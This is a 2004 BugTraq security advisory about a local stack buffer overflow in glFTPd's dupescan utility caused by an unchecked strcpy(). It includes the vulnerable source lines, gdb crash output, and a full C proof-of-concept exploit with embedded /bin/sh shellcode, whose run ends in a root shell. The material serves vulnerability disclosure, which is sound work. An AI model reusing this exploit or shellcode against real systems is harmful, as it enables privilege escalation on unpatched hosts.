BugTraq
glFTPd local stack buffer overflow Sep 19 2004 04:12AM
CoKi (coki nosystem com ar)


-------------------------------------------------

No System Group - Advisory #05 - 18/09/04

-------------------------------------------------

Program: glFTPd

Homepage: http://www.glftpd.com

Vulnerable Versions: glFTPd v2.00RC3 and prior

Risk: Low / Medium

Impact: Local Stack Buffer Overflow Vulnerability

-------------------------------------------------

- DESCRIPTION

-------------------------------------------------

glFTPd is a very advanced ftp server with lots of

possibilities. One of the main differences between

many other ftp servers and glFTPd is that it has its

own user database which can be completely maintained

online using ftp site commands. Using ftp site commands

it is also possible to see stats, view logs, execute

scripts and do many more things. glFTPd runs within

a chroot environment which makes it relatively safe.

The glFTPd team continuously works on improving this

free piece of beautiful software.

More informations at: http://www.glftpd.com

- DETAILS

-------------------------------------------------

This vulnerability is caused by an unsafe strcpy()

that copies the entire parameter of the 'dupescan'

to a stack buffer of 255 bytes.

--- dupescan.c ---

39: int main (int argc, char *argv[]) {

40: FILE *fp;

41: char dupename[255], dupefile[255], Temp[255];

42: struct dupefile buffer;

43: if (argc == 1){

44: printf("USAGE: %s <filename>\n", argv[0]);

45: return 0;

46: }

47:

48: read_conf_datapath(Temp);

49: sprintf(dupefile, "%s/logs/dupefile", Temp);

50:

51: strcpy(dupename, argv[1]); <----- THE BUG

52: if((fp = fopen(dupefile, "r")) == NULL)

53: return 0;

54:

--- dupescan.c ---

coki@nosystem:~$ /glftpd/bin/dupescan `perl -e 'print "A" x 300'`

Done

Segmentation fault

coki@nosystem:~$

coki@nosystem:~$ gdb /glftpd/bin/dupescan

GNU gdb 6.1.1

Copyright 2004 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 300'`

Starting program: /glftpd/bin/dupescan `perl -e 'print "A" x 300'`

Done

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb) quit

The program is running. Exit anyway? (y or n) y

coki@nosystem:~$

- EXPLOIT

-------------------------------------------------

-------------- glFTPd-dupe_exp.c ----------------

/* glFTPd local stack buffer overflow exploit

(Proof of Concept)

Tested in Slackware 9.0 / 9.1 / 10.0

by CoKi <coki (at) nosystem.com (dot) ar [email concealed]>

No System Group - http://www.nosystem.com.ar

*/

#include <stdio.h>

#include <strings.h>

#include <unistd.h>

#define BUFFER 288 + 1

#define PATH "/glftpd/bin/dupescan"

char shellcode[]=

"\xb0\x31\xcd\x80\x89\xc3\x31\xc0\xb0\x17\xcd\x80"

"\x31\xdb\x31\xc0\xb0\x17\xcd\x80"

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07"

"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"

"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(void) {

char *env[3] = {shellcode, NULL};

char buf[BUFFER], *path;

int *buffer = (int *) (buf);

int i;

int ret = 0xbffffffa - strlen(shellcode) - strlen(PATH);

for(i=0; i<=BUFFER; i+=4)

*buffer++ = ret;

printf("\n glFTPd local stack buffer overflow (Proof of Concept)\n");

printf(" by CoKi <coki (at) nosystem.com (dot) ar [email concealed]>\n\n");

execle(PATH, "dupescan", buf, NULL, env);

}

-------------- glFTPd-dupe_exp.c ----------------

coki@servidor:~$ make glFTPd-dupe_exp

coki@servidor:~$ ./glFTPd-dupe_exp

glFTPd local stack buffer overflow (Proof of Concept)

by CoKi <coki (at) nosystem.com (dot) ar [email concealed]>

Done

sh-2.05b# id

uid=0(root) gid=100(users) groups=100(users),11(floppy),17(audio),18(video),19(cdrom)

sh-2.05b#

'dupescan' is not setuid by default :(

- SOLUTIONS

-------------------------------------------------

No yet

- REFERENCES

-------------------------------------------------

http://www.nosystem.com.ar/advisories/advisory-05.txt

- CREDITS

-------------------------------------------------

Discovered by CoKi <coki (at) nosystem.com (dot) ar [email concealed]>

No System Group - http://www.nosystem.com.ar

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus